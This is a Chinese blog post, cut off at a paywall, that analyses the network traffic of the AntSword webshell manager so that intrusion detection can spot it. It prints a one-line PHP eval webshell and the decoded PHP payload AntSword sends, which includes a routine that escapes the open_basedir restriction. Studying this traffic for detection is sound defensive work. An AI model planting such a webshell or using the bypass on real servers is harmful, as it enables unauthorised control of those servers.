蚁剑流量分析

最新推荐文章于 2025-05-05 22:43:34 发布

真不想起名TAT

最新推荐文章于 2025-05-05 22:43:34 发布

阅读量2.3k

点赞数 1

分类专栏：网络安全文章标签：网络安全

本文链接：https://blog.csdn.net/I_like_ctrl/article/details/126823622

版权

25号那一天，冰蝎恰好更新到了 4.0 版本，当时引得流量监控的老哥很紧张，告诉我要看好 IDS 警报。因为一旦 WebShell 攻破就有可能在内网采取行动。

然后引发我极大的好奇，决定活动结束后回去好好研究。

现在在家闲的没事，就先研究一下蚁剑吧，剩下的冰蝎、哥斯拉过几天研究。

1. 未加密流量形式

我们可以直接写一个简单的一句话木马

<?php 
    @eval($_POST[sa]);
?>

此时是没有进行流量加密的,我们上交到服务器,然后进行抓包

进行 URL 解码后,我们收到的是一段 PHP 代码(很长不想看的建议滑过去看后面的内容)

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
   
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
   
        if (!@is_writable($item)) {
   
            continue;
        };
        $tmdir = $item . "/.1b7683e8cb4";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
   
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
   
            @chdir("..");
        };
        @ini_set("open_basedir", " /");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
   
    return $out;
};
function asoutput()
{
   
    $output = ob_get_contents();
    ob_end_clean();
    echo "cdd3" . "7c35e";
    echo @asenc($output);
    echo "c9cb" . "8c28";
}
ob_start();
try

最低0.47元/天解锁文章